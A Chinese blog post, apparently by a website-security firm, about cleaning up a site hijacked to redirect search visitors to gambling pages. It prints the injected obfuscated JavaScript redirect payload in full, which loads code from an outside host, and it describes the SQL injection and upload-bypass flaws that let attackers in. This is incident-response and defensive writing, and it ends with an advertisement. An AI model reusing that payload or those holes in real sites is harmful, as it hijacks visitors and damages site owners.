网站标题被篡改成北京赛车、PK10的解决处理办法

  1. 云栖社区>
  2. 博客>
  3. 正文

网站标题被篡改成北京赛车、PK10的解决处理办法

网站安全者 2018-07-14 09:19:00 浏览881
展开阅读全文

客户网站于近日被跳转到赌博网站,打开后直接跳转到什么北京赛车,PK10等内容的网站上去,客户网站本身做了百度的推广,导致所有访问用户都跳转到赌博网站上去,给客户带来很大的经济损失,再一个官方网站的形象也受到了影响。我们SINE安全对客户网站进行检查发现,客户网站的标题TDK被反复篡改成(北京赛车PK10等内容)立刻对该客户网站的安全,进行全面的源代码安全审计以及网站漏洞检测与网站漏洞修复,检查了客户的首页标题TDK内容确实是被篡改,并添加了一些加密的恶意代码,代码如下:

type="text/java"eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('m["\\9\\d\\1\\l\\i\\a\\n\\0"]["\\8\\4\\6\\0\\a"](\'\\h\\3\\1\\4\\6\\2\\0 \\0\\k\\2\\a\\e\\7\\0\\a\\q\\0\\5\\g\\b\\f\\b\\3\\1\\4\\6\\2\\0\\7 \\3\\4\\1\\e\\7\\o\\0\\0\\2\\3\\p\\5\\5\\8\\8\\8\\c\\1\\2\\9\\b\\3\\r\\c\\1\\d\\i\\5\\9\\9\\f\\6\\2\\c\\g\\3\\7\\j\\h\\5\\3\\1\\4\\6\\2\\0\\j\');',28,28,'x74|x63|x70|x73|x72|x2f|x69|x22|x77|x64|x65|x61|x2e|x6f|x3d|x76|x6a|x3c|x6d|x3e|x79|x75|window|x6e|x68|x3a|x78|x38'.split('|'),0,{}))

上述网站代码是ASCII编码,只要转换成Unicode编码,就可以看到加密的真实内容。我们工程师对代码进行解读,发现该代码写的是根据搜索引擎作为判断条件进行跳转的代码,通俗来讲就是说,该代码只针对搜索引擎,网站管理员直接输入网址并不会发现网站跳转到赌博内容网站上去,客户的网站通过百度或搜狗搜索会直接跳转到这个北京赛车、pk10的网站上去。

针对于上述的问题,我们立即删除加密的跳转代码,先将客户网站损失降到最低,促使网站正常访问(因为客户一直在做百度推广,一直在烧钱),通过一系列的安全检测,网站到底是因为那些漏洞被上传木马,并篡改网站首页的呢?经过我们Sine安全工程师对网站代码的详细的安全检测后,发现该网站系统存在SQL注入漏洞,导致攻击者可以获取到管理员账户和密码,而网站后台的地址用的也是默认的admin目录名,致使黑客获取密码后,直接登录网站后台,在对网站后台安全检测的时候,发现产品图片上传功能,存在绕过格式上传脚本木马的漏洞。

该网站漏洞产生于网站后台的产品上传页面代码中的$this->getext($filear["name"]); //取得扩展名$this->set_savename($file); //设置保存文件名,这个代码对文件扩展名可以直接绕过并上传php格式的脚本文件,从而让攻击者轻易取得网站的权限。客户还反映说,网站经常被反复的篡改,导致跳转到赌博网站,找了网站建设的公司,他们也只是删除掉代码,没过多久就又被篡改跳转了,导致客户网站损失严重,发生篡改跳转的根本原因就是网站有漏洞,如果没有修复好网站漏洞,即使删除掉恶意代码也只是表面上的工作,不起作用的还是会被反复篡改,于事无补,亡羊补牢一样。需要对网站进行安全检测,以及网站漏洞检测,并修复好网站漏洞,清除木马后门,网站安全部署好,才会使网站更加的安全稳定运行。

网站漏洞修复的处理过程如下:

对客户网站源代码进行安全加固以及防止sql注入的前端过滤代码,网站的后台目录安全设置,更改admin文件名为@#%admin,对网站后台图片上传功能代码进行漏洞修复,设置上传文件白名单机制,以及文件上传的目录进行了脚本安全权限设置,禁止进行脚本,对上传的文件扩展也进行了深入的安全过滤,网站的数据库安全部署,对数据库的连接信息进行加密,删除root管理权限,设置普通数据库账号,读写分离,新建表,查询表,写入表等数据库正常操作权限,网站后台的账号密码设置的复杂一些,密码为12位数字+字母+大小写组合,从发现网站漏洞到目前解决问题中,共查找到脚本木马3个(webshell),一句话小马后门2个,发现网站的模板内容也被篡改了,导致客户生成首页的时候随之也被加了恶意加密的代码。

网站安全预防措施:

1.尽量避免网站后台的默认名称如admin manage houtai

2.对网站上传目录的权限进行控制。(设置无脚本执行权限)

3.网站后台的用户名和密码设置复杂点,数字+字母+大小写+特殊符号组合。

4.阿里云虚拟主机用户的FTP账号密码要设置复杂点,数字+字母+大小写+特殊符号组合。

5.如果是单独服务器的客户,建议先把服务器的安全部署好,对每个网站的文件夹进行安全部署,数据库安全部署,,再做网站的安全,否则你网站再安全,服务器不安全也是于事无补。如果对安全不是太懂的话,建议找专业的网站安全公司去处理解决。

专注于安全领域 解决网站安全 解决网站被黑 网站被挂马 网站被篡改 网站安全、服务器安全提供商-www.sinesafe.com --专门解决其他人解决不了的网站安全问题.

网友评论

登录后评论
0/500
评论
网站安全者
+ 关注